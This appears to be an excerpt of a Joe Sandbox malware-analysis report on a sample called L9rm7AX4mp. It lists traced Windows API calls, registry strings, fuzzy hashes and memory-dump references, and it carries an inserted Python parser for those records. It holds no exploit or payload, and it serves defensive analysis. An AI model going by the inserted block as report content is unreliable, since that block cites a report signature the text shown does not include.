• Opcode Fuzzy Hash: 1f02ae1e850569658feceaaf3c85ff1782ed1f35d471b3de261e4d8f3d8ed172
• Instruction Fuzzy Hash: AE513F74A00248ABDB04DFA5D582BDEB7F5AF09304F50817BE850B7382D7786E08CB69
APIs
• GetProcAddress.KERNEL32(00000000,SfcIsFileProtected), ref: 00454E6E
• MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000FFF,00000000,00454F34), ref: 00454ED8
Strings
Memory Dump Source
• Source File: 00000001.00000002.3287555822.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.3287524479.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3287643441.0000000000499000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3287665992.000000000049A000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3287686805.000000000049B000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3287714931.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_L9rm7AX4mp.jbxd
Similarity
• API ID: AddressByteCharMultiProcWide
• String ID: SfcIsFileProtected$sfc.dll
• API String ID: 2508298434-591603554
• Opcode ID: 6a91046d7309a4de6cfc4beec76e0de6ac9bbff88298f3f0baf31012854e5b94
• Instruction ID: 1a17c74f1ac94ad93f17d87dc1e08c5ddb540f3824a5df31749c88666692504e
• Opcode Fuzzy Hash: 6a91046d7309a4de6cfc4beec76e0de6ac9bbff88298f3f0baf31012854e5b94
• Instruction Fuzzy Hash: 6A41A630A042189BEB10DB69DC85B9D77B8AB4430DF5081B7E908A7293D7785F88CF59
APIs
• 73A0A570.USER32(00000000,?,00000000,00000000,0044B49D,?,k H,?,?), ref: 0044B411
• SelectObject.GDI32(?,00000000), ref: 0044B434
• 73A0A480.USER32(00000000,?,0044B474,00000000,0044B46D,?,00000000,?,00000000,00000000,0044B49D,?,k H,?,?), ref: 0044B467
Strings
Memory Dump Source
• Source File: 00000001.00000002.3287555822.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.3287524479.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3287643441.0000000000499000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3287665992.000000000049A000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3287686805.000000000049B000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3287714931.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_L9rm7AX4mp.jbxd
Similarity
• API ID: A480A570ObjectSelect
• String ID: k H
• API String ID: 1230475511-1447039187
• Opcode ID: d4c138e2771e5465782f1838dde397b15c475f1a6013829dedf10027ea17c150
• Instruction ID: b5872ed9d16ca79c431bae9e7544c15e8f802733be01f045b529408bc148fe47
• Opcode Fuzzy Hash: d4c138e2771e5465782f1838dde397b15c475f1a6013829dedf10027ea17c150
• Instruction Fuzzy Hash: 6D217470A04248AFEB15DFA5C851B9EBBB9EB49304F51807AF504E7282D77CD940CB69
APIs
• MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00000000,0044B15C,?,k H,?,?), ref: 0044B12E
• DrawTextW.USER32(?,?,00000000,?,?), ref: 0044B141
• DrawTextA.USER32(?,00000000,00000000,?,?), ref: 0044B175
Strings
Memory Dump Source
• Source File: 00000001.00000002.3287555822.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.3287524479.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3287643441.0000000000499000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3287665992.000000000049A000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3287686805.000000000049B000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3287714931.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_L9rm7AX4mp.jbxd
Similarity
• API ID: DrawText$ByteCharMultiWide
• String ID: k H
• API String ID: 65125430-1447039187
• Opcode ID: 9eee4d412d6110b2587a1d6710a95c773ea7c34e3a7d98a27860af6b4704048a
• Instruction ID: 2dd5a1fcad8022b5ecdd36c3e8438632fadfe976456551c737a9f8dd3ea145e1
• Opcode Fuzzy Hash: 9eee4d412d6110b2587a1d6710a95c773ea7c34e3a7d98a27860af6b4704048a
• Instruction Fuzzy Hash: A3110BB6700604BFE700DB5A9C91D6F77ECD749750F10413BF504D72D0C6389E018668
                                                                                                      APIs
                                                                                                      • SHAutoComplete.SHLWAPI(00000000,00000001), ref: 0042EDD5
                                                                                                        • Part of subcall function 0042D8D4: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 0042D8E7
                                                                                                        • Part of subcall function 0042E3A4: SetErrorMode.KERNEL32(00008000), ref: 0042E3AE
                                                                                                        • Part of subcall function 0042E3A4: LoadLibraryA.KERNEL32(00000000,00000000,0042E3F8,?,00000000,0042E416,?,00008000), ref: 0042E3DD
                                                                                                      • GetProcAddress.KERNEL32(00000000,SHAutoComplete), ref: 0042EDB8
                                                                                                      Strings
                                                                                                      Similarity
                                                                                                      • API ID: AddressAutoCompleteDirectoryErrorLibraryLoadModeProcSystem
                                                                                                      • String ID: SHAutoComplete$shlwapi.dll
                                                                                                      • API String ID: 395431579-1506664499
                                                                                                      • Opcode ID: 0d90ae9549cb3a794f747e0b3b89476a1a48bf8a1e7f9d56d35495b62d60795c
                                                                                                      • Instruction ID: a33720f3aac7210c00664dabe11b621525643aa7ae94b1405928deeb439ddd4e
                                                                                                      • Opcode Fuzzy Hash: 0d90ae9549cb3a794f747e0b3b89476a1a48bf8a1e7f9d56d35495b62d60795c
                                                                                                      • Instruction Fuzzy Hash: 1611A331B00318BBDB11EB62ED81B8E7BA8DB55704F90407BF400A6691DBB8AE05C65D
                                                                                                      APIs
                                                                                                        • Part of subcall function 0042DE2C: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,c6H,?,00000001,?,?,00483663,?,00000001,00000000), ref: 0042DE48
                                                                                                      • RegCloseKey.ADVAPI32(?,00455A67,?,00000001,00000000), ref: 00455A5A
                                                                                                      Strings
                                                                                                      • SYSTEM\CurrentControlSet\Control\Session Manager, xrefs: 00455A08
                                                                                                      • PendingFileRenameOperations, xrefs: 00455A2C
                                                                                                      • PendingFileRenameOperations2, xrefs: 00455A3B
                                                                                                      Similarity
                                                                                                      • API ID: CloseOpen
                                                                                                      • String ID: PendingFileRenameOperations$PendingFileRenameOperations2$SYSTEM\CurrentControlSet\Control\Session Manager
                                                                                                      • API String ID: 47109696-2115312317
                                                                                                      • Opcode ID: a871c7690d9b103e0f7f2022bbb7230101daa82acd14c33f99511ba30d6e5aa6
                                                                                                      • Instruction ID: a84b10804161a04e9b7828e63518c67389a2277fb2d5ef6d9c2d81c30e1ce2e0
                                                                                                      • Opcode Fuzzy Hash: a871c7690d9b103e0f7f2022bbb7230101daa82acd14c33f99511ba30d6e5aa6
                                                                                                      • Instruction Fuzzy Hash: 49F09671714A04BFEB05D665DC72E3A739CD744B15FA1446BF800C6682DA7DBE04951C
                                                                                                      APIs
                                                                                                      • FindNextFileA.KERNEL32(000000FF,?,?,?,?,00000000,0047F9FD,?,00000000,00000000,?,?,00480C0D,?,?,00000000), ref: 0047F8AA
                                                                                                      • FindClose.KERNEL32(000000FF,000000FF,?,?,?,?,00000000,0047F9FD,?,00000000,00000000,?,?,00480C0D,?,?), ref: 0047F8B7
                                                                                                      • FindNextFileA.KERNEL32(000000FF,?,00000000,0047F9D0,?,?,?,?,00000000,0047F9FD,?,00000000,00000000,?,?,00480C0D), ref: 0047F9AC
                                                                                                      • FindClose.KERNEL32(000000FF,0047F9D7,0047F9D0,?,?,?,?,00000000,0047F9FD,?,00000000,00000000,?,?,00480C0D,?), ref: 0047F9CA
                                                                                                      Similarity
                                                                                                      • API ID: Find$CloseFileNext
                                                                                                      • String ID:
                                                                                                      • API String ID: 2066263336-0
                                                                                                      • Opcode ID: dd47ce488d5ea13da555b7d1a4745cf9b199e366fd9c8806cfe2b69594f7a430
                                                                                                      • Instruction ID: d4c1b09f85a1e3ce5f066f5119f691750f955bf6e0a6470712ab8dbd39f482a6
                                                                                                      • Opcode Fuzzy Hash: dd47ce488d5ea13da555b7d1a4745cf9b199e366fd9c8806cfe2b69594f7a430
                                                                                                      • Instruction Fuzzy Hash: 80513E71A00648AFCB10EF65CC45ADEB7B8AB88315F1085BAA818E7351D7389F49CF59
                                                                                                      APIs
                                                                                                      • GetMenu.USER32(00000000), ref: 00421371
                                                                                                      • SetMenu.USER32(00000000,00000000), ref: 0042138E
                                                                                                      • SetMenu.USER32(00000000,00000000), ref: 004213C3
                                                                                                      • SetMenu.USER32(00000000,00000000), ref: 004213DF
                                                                                                      Similarity
                                                                                                      • API ID: Menu
                                                                                                      • String ID:
                                                                                                      • API String ID: 3711407533-0
                                                                                                      • Opcode ID: fcb1d01c21a3638414a8535da0e373d0dc57cc6d33ffad44a18b700e1522ce17
                                                                                                      • Instruction ID: 7918b5ac66a49b7c70f092078a7f06842b1ce09055eaa5e04548cec6233339c2
                                                                                                      • Opcode Fuzzy Hash: fcb1d01c21a3638414a8535da0e373d0dc57cc6d33ffad44a18b700e1522ce17
                                                                                                      • Instruction Fuzzy Hash: 7D41A13070025447EB20EA79A9857AB26969F69318F4805BFFC44DF3A3CA7DDC45839D
                                                                                                      APIs
                                                                                                      • SendMessageA.USER32(?,?,?,?), ref: 00416B94
                                                                                                      • SetTextColor.GDI32(?,00000000), ref: 00416BAE
                                                                                                      • SetBkColor.GDI32(?,00000000), ref: 00416BC8
                                                                                                      • CallWindowProcA.USER32(?,?,?,?,?), ref: 00416BF0
                                                                                                      Similarity
                                                                                                      • API ID: Color$CallMessageProcSendTextWindow
                                                                                                      • String ID:
                                                                                                      • API String ID: 601730667-0
                                                                                                      • Opcode ID: c8424e95f6d781db4325e6c83d9f419e4623fd2ec4a9fd1ab852655791a28026
                                                                                                      • Instruction ID: 7a78515b3e46194db8101330e18da160614de8b80347fcfd5663145ee8fb6c7e
                                                                                                      • Opcode Fuzzy Hash: c8424e95f6d781db4325e6c83d9f419e4623fd2ec4a9fd1ab852655791a28026
                                                                                                      • Instruction Fuzzy Hash: 27115EB6600A04AFC710EE6ECC84E8773ECDF48314715883EB59ADB612D638F8418B69
                                                                                                      APIs
                                                                                                      • 73A0A570.USER32(00000000,?,?,00000000,?,00418FE3,00000000,?,?,?,00000001), ref: 0042312E
                                                                                                      • EnumFontsA.GDI32(00000000,00000000,00423078,00410660,00000000,?,?,00000000,?,00418FE3,00000000,?,?,?,00000001), ref: 00423141
                                                                                                      • 73A14620.GDI32(00000000,0000005A,00000000,00000000,00423078,00410660,00000000,?,?,00000000,?,00418FE3,00000000), ref: 00423149
                                                                                                      • 73A0A480.USER32(00000000,00000000,00000000,0000005A,00000000,00000000,00423078,00410660,00000000,?,?,00000000,?,00418FE3,00000000), ref: 00423154
                                                                                                      Similarity
                                                                                                      • API ID: A14620A480A570EnumFonts
                                                                                                      • String ID:
                                                                                                      • API String ID: 2780753366-0
                                                                                                      • Opcode ID: 1e77baaa554069656ebb7f1896433780fe2d8d07f1dc07fb2a8b7fd44a0a16f2
                                                                                                      • Instruction ID: 16e9332b6476af0d686f12fa818e5571f82757a24bc5219822a197079b30e1ec
                                                                                                      • Opcode Fuzzy Hash: 1e77baaa554069656ebb7f1896433780fe2d8d07f1dc07fb2a8b7fd44a0a16f2
                                                                                                      • Instruction Fuzzy Hash: D80192717447106AE710BF7A5C86B9B36649F04719F40427BF804AF2C7D6BE9C05476E
                                                                                                      APIs
                                                                                                        • Part of subcall function 00450918: SetEndOfFile.KERNEL32(?,?,0045C6A6,00000000,0045C831,?,00000000,00000002,00000002), ref: 0045091F
                                                                                                      • FlushFileBuffers.KERNEL32(?), ref: 0045C7FD
                                                                                                      Strings
                                                                                                      • EndOffset range exceeded, xrefs: 0045C731
                                                                                                      • NumRecs range exceeded, xrefs: 0045C6FA
                                                                                                      Similarity
                                                                                                      • API ID: File$BuffersFlush
                                                                                                      • String ID: EndOffset range exceeded$NumRecs range exceeded
                                                                                                      • API String ID: 3593489403-659731555
                                                                                                      • Opcode ID: 794c48d8177613dd3f63bd91f05815d926f9d199b7ec90082a892dce85f7227f
                                                                                                      • Instruction ID: 42c6ccb15965a4bc01c0ab80d29458e35b3cecf9486565f2d0e9c4cbdba5a9bf
                                                                                                      • Opcode Fuzzy Hash: 794c48d8177613dd3f63bd91f05815d926f9d199b7ec90082a892dce85f7227f
                                                                                                      • Instruction Fuzzy Hash: A5617134A002988FDB24DF25C891AD9B7B5EF49305F0084DAED89AB352D774AEC9CF54
                                                                                                      APIs
                                                                                                        • Part of subcall function 00403344: GetModuleHandleA.KERNEL32(00000000,00498586), ref: 0040334B
                                                                                                        • Part of subcall function 00403344: GetCommandLineA.KERNEL32(00000000,00498586), ref: 00403356
                                                                                                        • Part of subcall function 00406334: GetModuleHandleA.KERNEL32(kernel32.dll,?,00498590), ref: 0040633A
                                                                                                        • Part of subcall function 00406334: GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 00406347
                                                                                                        • Part of subcall function 00406334: GetProcAddress.KERNEL32(00000000,SetSearchPathMode), ref: 0040635D
                                                                                                        • Part of subcall function 00406334: GetProcAddress.KERNEL32(00000000,SetProcessDEPPolicy), ref: 00406373
                                                                                                        • Part of subcall function 00406334: SetProcessDEPPolicy.KERNEL32(00000001,00000000,SetProcessDEPPolicy,00000000,SetSearchPathMode,kernel32.dll,?,00498590), ref: 0040637E
                                                                                                        • Part of subcall function 00409B88: 6F541CD0.COMCTL32(0049859A), ref: 00409B88
                                                                                                        • Part of subcall function 00410964: GetCurrentThreadId.KERNEL32 ref: 004109B2
                                                                                                        • Part of subcall function 00419050: GetVersion.KERNEL32(004985AE), ref: 00419050
                                                                                                        • Part of subcall function 0044F754: GetModuleHandleA.KERNEL32(user32.dll,NotifyWinEvent,004985C2), ref: 0044F78F
                                                                                                        • Part of subcall function 0044F754: GetProcAddress.KERNEL32(00000000,user32.dll), ref: 0044F795
                                                                                                        • Part of subcall function 0044FBFC: GetVersionExA.KERNEL32(0049B790,004985C7), ref: 0044FC0B
                                                                                                        • Part of subcall function 004531DC: GetModuleHandleA.KERNEL32(kernel32.dll,Wow64DisableWow64FsRedirection,00000000,00453275,?,?,?,?,00000000,?,004985D6), ref: 004531FC
                                                                                                        • Part of subcall function 004531DC: GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00453202
                                                                                                        • Part of subcall function 004531DC: GetModuleHandleA.KERNEL32(kernel32.dll,Wow64RevertWow64FsRedirection,00000000,kernel32.dll,Wow64DisableWow64FsRedirection,00000000,00453275,?,?,?,?,00000000,?,004985D6), ref: 00453216
                                                                                                        • Part of subcall function 004531DC: GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 0045321C
                                                                                                        • Part of subcall function 00456EEC: GetProcAddress.KERNEL32(00000000,SHCreateItemFromParsingName), ref: 00456F10
                                                                                                        • Part of subcall function 00464960: LoadLibraryA.KERNEL32(shell32.dll,SHPathPrepareForWriteA,004985EA), ref: 0046496F
                                                                                                        • Part of subcall function 00464960: GetProcAddress.KERNEL32(00000000,shell32.dll), ref: 00464975
                                                                                                        • Part of subcall function 0046D098: GetProcAddress.KERNEL32(00000000,SHPathPrepareForWriteA), ref: 0046D0AD
                                                                                                        • Part of subcall function 00478B3C: GetModuleHandleA.KERNEL32(kernel32.dll,?,004985F4), ref: 00478B42
                                                                                                        • Part of subcall function 00478B3C: GetProcAddress.KERNEL32(00000000,VerSetConditionMask), ref: 00478B4F
                                                                                                        • Part of subcall function 00478B3C: GetProcAddress.KERNEL32(00000000,VerifyVersionInfoW), ref: 00478B5F
                                                                                                        • Part of subcall function 00495584: RegisterClipboardFormatA.USER32(QueryCancelAutoPlay), ref: 0049559D
                                                                                                      • SetErrorMode.KERNEL32(00000001,00000000,0049863C), ref: 0049860E
                                                                                                        • Part of subcall function 00498338: GetModuleHandleA.KERNEL32(user32.dll,DisableProcessWindowsGhosting,00498618,00000001,00000000,0049863C), ref: 00498342
                                                                                                        • Part of subcall function 00498338: GetProcAddress.KERNEL32(00000000,user32.dll), ref: 00498348
                                                                                                        • Part of subcall function 004244E4: SendMessageA.USER32(?,0000B020,00000000,?), ref: 00424503
                                                                                                        • Part of subcall function 004242D4: SetWindowTextA.USER32(?,00000000), ref: 004242EC
                                                                                                      • ShowWindow.USER32(?,00000005,00000000,0049863C), ref: 0049866F
                                                                                                        • Part of subcall function 00482050: SetActiveWindow.USER32(?), ref: 004820FE
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3287555822.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                       • Associated: 00000001.00000002.3287524479.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                       • Associated: 00000001.00000002.3287643441.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                                       • Associated: 00000001.00000002.3287665992.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                                       • Associated: 00000001.00000002.3287686805.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                       • Associated: 00000001.00000002.3287714931.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_L9rm7AX4mp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: AddressProc$HandleModule$Window$Version$ActiveClipboardCommandCurrentErrorF541FormatLibraryLineLoadMessageModePolicyProcessRegisterSendShowTextThread
                                                                                                      • String ID: Setup
                                                                                                      • API String ID: 291738113-3839654196
                                                                                                      • Opcode ID: 0b193bc7ab6d0367c14efa4071f6efbf19235d44a4c70119fe87f529ba434d3c
                                                                                                      • Instruction ID: d131c851e578025af209eb9e9c2d0e6aaf1cfb04eb4cc82699b843ce611002a7
                                                                                                      • Opcode Fuzzy Hash: 0b193bc7ab6d0367c14efa4071f6efbf19235d44a4c70119fe87f529ba434d3c
                                                                                                      • Instruction Fuzzy Hash: 5C31D4702046409ED601BBBBED5352E3B98EB8A718B61487FF804D6553CE3D6C148A3E
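Added example, not part of the Joe Sandbox report or of the analysed sample: a small Python parser for the API record lines in this format (`Name.MODULE(args), ref: address`, with a `Part of subcall function <addr>:` prefix for callee entries). It takes a handful of lines constructed from the records on this page, extracts each call, and lists the export names the sample resolves at runtime through GetProcAddress together with the DLLs it loads or looks up. Because the report prints the raw stack values present at call time, a slot holding a hex value, `?` or a leaked DLL file name (as in `GetProcAddress.KERNEL32(00000000,user32.dll)` above) is not treated as an export name; the `looks_like_proc_name` filter and the `SAMPLE` text are assumptions of this example, not something the report defines.

```python
import re
from dataclasses import dataclass

# A bare 8-digit hex value: an address or handle shown in an argument slot.
HEX_RE = re.compile(r"^[0-9A-Fa-f]{8}$")

# One Joe Sandbox API record line. The argument list and the ", ref:" part are
# optional because some lines read e.g. "GetCurrentThreadId.KERNEL32 ref: 004109B2".
LINE_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<caller>[0-9A-Fa-f]{8}):\s*)?"
    r"(?P<api>\w+)\.(?P<module>\w+)"
    r"(?:\((?P<args>[^)]*)\))?"
    r"(?:,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]{8}))?\s*$"
)

# Constructed sample: lines copied from the records on this page.
SAMPLE = """\
• Part of subcall function 0044F754: GetModuleHandleA.KERNEL32(user32.dll,NotifyWinEvent,004985C2), ref: 0044F78F
• Part of subcall function 0044F754: GetProcAddress.KERNEL32(00000000,user32.dll), ref: 0044F795
• Part of subcall function 00410964: GetCurrentThreadId.KERNEL32 ref: 004109B2
• Part of subcall function 00456EEC: GetProcAddress.KERNEL32(00000000,SHCreateItemFromParsingName), ref: 00456F10
• Part of subcall function 00464960: LoadLibraryA.KERNEL32(shell32.dll,SHPathPrepareForWriteA,004985EA), ref: 0046496F
• Part of subcall function 00478B3C: GetProcAddress.KERNEL32(00000000,VerSetConditionMask), ref: 00478B4F
• Part of subcall function 00478B3C: GetProcAddress.KERNEL32(00000000,VerifyVersionInfoW), ref: 00478B5F
• SetErrorMode.KERNEL32(00000001,00000000,0049863C), ref: 0049860E
• LoadLibraryExA.KERNEL32(00000000,00000000,00000008,?,?,00000000,00448719), ref: 0044865C
• GetProcAddress.KERNEL32(00000000,00000000), ref: 004486DD
"""


@dataclass
class ApiCall:
    api: str
    module: str
    args: list
    ref: str      # call-site address from the "ref:" field, "" if absent
    caller: str   # address of the subcall function, "" for direct calls


def parse_api_lines(text):
    """Parse every API record line; section headers and hash lines are skipped."""
    calls = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        raw = m.group("args")
        args = [a.strip() for a in raw.split(",")] if raw else []
        calls.append(ApiCall(m.group("api"), m.group("module").upper(), args,
                             m.group("ref") or "", m.group("caller") or ""))
    return calls


def looks_like_proc_name(value):
    """Heuristic (assumption of this example): an lpProcName slot is an identifier,
    not a hex stack value, an unknown '?' or a DLL file name that leaked into it."""
    if not value or value == "?" or HEX_RE.match(value) or value.lower().endswith(".dll"):
        return False
    return re.fullmatch(r"[A-Za-z_][A-Za-z0-9_]*", value) is not None


def resolved_imports(calls):
    """Map each export name resolved via GetProcAddress to the call sites resolving it."""
    out = {}
    for c in calls:
        if c.api == "GetProcAddress" and len(c.args) >= 2 and looks_like_proc_name(c.args[1]):
            out.setdefault(c.args[1], set()).add(c.ref)
    return out


def loaded_modules(calls):
    """DLL names passed as the first argument of LoadLibrary*/GetModuleHandleA."""
    mods = set()
    for c in calls:
        if c.api in ("LoadLibraryA", "LoadLibraryExA", "GetModuleHandleA") and c.args:
            if c.args[0].lower().endswith(".dll"):
                mods.add(c.args[0].lower())
    return mods


if __name__ == "__main__":
    parsed = parse_api_lines(SAMPLE)
    print(f"{len(parsed)} API calls parsed")
    print("modules:", sorted(loaded_modules(parsed)))
    for name, sites in sorted(resolved_imports(parsed).items()):
        print(f"late-bound import {name} resolved at {sorted(sites)}")
```

Run over a whole saved report instead of the constructed sample, the same functions give the complete set of late-bound exports, which is the evidence behind the report's "Contains functionality to dynamically determine API calls" signature and lets you compare that set against the static import table of the file.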
                                                                                                      APIs
                                                                                                      • CreateDirectoryA.KERNEL32(00000000,00000000,?,00000000,00453AFF,?,?,00000000,0049B628,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00453A56
                                                                                                      • GetLastError.KERNEL32(00000000,00000000,?,00000000,00453AFF,?,?,00000000,0049B628,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00453A5F
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3287555822.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                       • Associated: 00000001.00000002.3287524479.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                       • Associated: 00000001.00000002.3287643441.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                                       • Associated: 00000001.00000002.3287665992.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                                       • Associated: 00000001.00000002.3287686805.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                       • Associated: 00000001.00000002.3287714931.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_L9rm7AX4mp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CreateDirectoryErrorLast
                                                                                                      • String ID: .tmp
                                                                                                      • API String ID: 1375471231-2986845003
                                                                                                      • Opcode ID: 3cb25ddd520bb7346a311bd12df13eef30655657fdbd9206c6de24d758997ec8
                                                                                                      • Instruction ID: fcbeb811eea92760dd82faa40bdacdd366465f8a5342b7af386d3ee3900427bd
                                                                                                      • Opcode Fuzzy Hash: 3cb25ddd520bb7346a311bd12df13eef30655657fdbd9206c6de24d758997ec8
                                                                                                      • Instruction Fuzzy Hash: 5A213375A00208ABDB01EFA1C8429DEB7B9EB48305F50457BE801B7342DA789F058AA5
                                                                                                      APIs
                                                                                                      • RegCloseKey.ADVAPI32(?,?,00000001,00000000,?,?,?,0047C596,00000000,0047C5AC,?,?,?,?,00000000), ref: 0047C372
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3287555822.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                       • Associated: 00000001.00000002.3287524479.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                       • Associated: 00000001.00000002.3287643441.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                                       • Associated: 00000001.00000002.3287665992.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                                       • Associated: 00000001.00000002.3287686805.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                       • Associated: 00000001.00000002.3287714931.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_L9rm7AX4mp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Close
                                                                                                      • String ID: RegisteredOrganization$RegisteredOwner
                                                                                                      • API String ID: 3535843008-1113070880
                                                                                                      • Opcode ID: 3cef9cafc9ae7832fbb6eaa2bd4d40f0f71bbb09bcea78efdfdb807f20eb42b3
                                                                                                      • Instruction ID: cd6b81515cbcb541a42d20c803a6709c30f964b406f28b15d8fe69fce277d2ff
                                                                                                      • Opcode Fuzzy Hash: 3cef9cafc9ae7832fbb6eaa2bd4d40f0f71bbb09bcea78efdfdb807f20eb42b3
                                                                                                      • Instruction Fuzzy Hash: 41F09030704204ABEB00D669ECD2BAA33A99746304F60C03FA9088B392D6799E01CB5C
                                                                                                      APIs
                                                                                                      • CreateFileA.KERNEL32(00000000,C0000000,00000000,00000000,00000001,00000080,00000000,00000000,?,004756F3), ref: 004754E1
                                                                                                      • CloseHandle.KERNEL32(00000000,00000000,C0000000,00000000,00000000,00000001,00000080,00000000,00000000,?,004756F3), ref: 004754F8
                                                                                                        • Part of subcall function 00453488: GetLastError.KERNEL32(00000000,0045401D,00000005,00000000,00454052,?,?,00000000,0049B628,00000004,00000000,00000000,00000000,?,00497D75,00000000), ref: 0045348B
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3287555822.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                       • Associated: 00000001.00000002.3287524479.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                       • Associated: 00000001.00000002.3287643441.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                                       • Associated: 00000001.00000002.3287665992.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                                       • Associated: 00000001.00000002.3287686805.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                       • Associated: 00000001.00000002.3287714931.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_L9rm7AX4mp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CloseCreateErrorFileHandleLast
                                                                                                      • String ID: CreateFile
                                                                                                      • API String ID: 2528220319-823142352
                                                                                                      • Opcode ID: fa36eb7f5e292efbad873286b983b31a245b5f10299435e2a562660d120c4ecb
                                                                                                      • Instruction ID: 40e201e46ebb19b1d9bf90fbf766f72b309683208074062896c4944ddf319cda
                                                                                                      • Opcode Fuzzy Hash: fa36eb7f5e292efbad873286b983b31a245b5f10299435e2a562660d120c4ecb
                                                                                                      • Instruction Fuzzy Hash: CDE065702403447FDA10F769CCC6F4577889B14729F10C155B5446F3D2C5B9EC408628
                                                                                                      APIs
                                                                                                      • RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,c6H,?,00000001,?,?,00483663,?,00000001,00000000), ref: 0042DE48
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3287555822.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3287524479.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287643441.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287665992.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287686805.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287714931.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_L9rm7AX4mp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Open
                                                                                                      • String ID: System\CurrentControlSet\Control\Windows$c6H
                                                                                                      • API String ID: 71445658-1548894351
                                                                                                      • Opcode ID: 532c08fc3a5ebe879a42036bede715a90f251433598981f36561c2967c82051c
